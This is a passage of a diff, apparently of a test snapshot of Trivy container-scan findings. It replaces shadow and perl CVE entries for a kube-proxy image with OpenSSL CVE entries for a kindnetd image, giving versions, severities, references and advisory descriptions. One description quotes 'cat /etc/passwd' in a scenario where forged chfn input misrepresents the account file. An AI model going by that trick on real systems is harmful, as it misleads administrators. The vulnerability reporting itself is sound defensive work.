"fixedVersion": "1.1.1d-0+deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3711", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/security/cve/CVE-2021-3711", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://security.netapp.com/advisory/ntap-20211022-0003/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", ], }, "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", + "name": "openssl: SM2 Decryption Buffer Overflow", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://avd.aquasec.com/nvd/cve-2021-3711", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://access.redhat.com/security/cve/CVE-2021-3711", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://www.tenable.com/security/tns-2022-02", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1292", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-1292", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "https://linux.oracle.com/cve/CVE-2022-1292.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220602-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://ubuntu.com/security/notices/USN-5402-1", + "https://ubuntu.com/security/notices/USN-5402-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "https://www.debian.org/security/2022/dsa-5139", + "https://www.openssl.org/news/secadv/20220503.txt", + "https://www.oracle.com/security-alerts/cpujul2022.html", + ], + }, + "category": "Vulnerability", + "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "c_rehash script allows command injection", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2022-1292", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://access.redhat.com/security/cve/CVE-2022-1292", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://bugzilla.redhat.com/2097310", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", - ], - }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-16156", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", - "references": [ - "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - "https://access.redhat.com/security/cve/CVE-2020-16156", - "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", - "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", - "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", - "https://ubuntu.com/security/notices/USN-5689-1", - "https://ubuntu.com/security/notices/USN-5689-2", - "https://www.cve.org/CVERecord?id=CVE-2020-16156", - ], - }, - "category": "Vulnerability", - "description": "CPAN 2.28 allows Signature Verification Bypass.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-16156", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", }, { "type": "URL", - "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-16156", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", }, { "type": "URL", - "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "value": "https://ubuntu.com/security/notices/USN-5402-1", }, { "type": "URL", - "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "value": "https://ubuntu.com/security/notices/USN-5402-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-1", + "value": "https://www.debian.org/security/2022/dsa-5139", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-2", + "value": "https://www.openssl.org/news/secadv/20220503.txt", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31484", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "fixedVersion": "1.1.1n-0+deb10u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2068", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", - "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", - "https://github.com/andk/cpanpm/pull/175", - "https://metacpan.org/dist/CPAN/changes", - "https://ubuntu.com/security/notices/USN-6112-1", - "https://ubuntu.com/security/notices/USN-6112-2", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2068", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "https://linux.oracle.com/cve/CVE-2022-2068.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "https://security.netapp.com/advisory/ntap-20220707-0008/", + "https://ubuntu.com/security/notices/USN-5488-1", + "https://ubuntu.com/security/notices/USN-5488-2", + "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "https://www.debian.org/security/2022/dsa-5169", + "https://www.openssl.org/news/secadv/20220621.txt", ], }, "category": "Vulnerability", - "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", + "name": "the c_rehash script allows command injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31484", + "value": "https://avd.aquasec.com/nvd/cve-2022-2068", }, { "type": "URL", - "value": 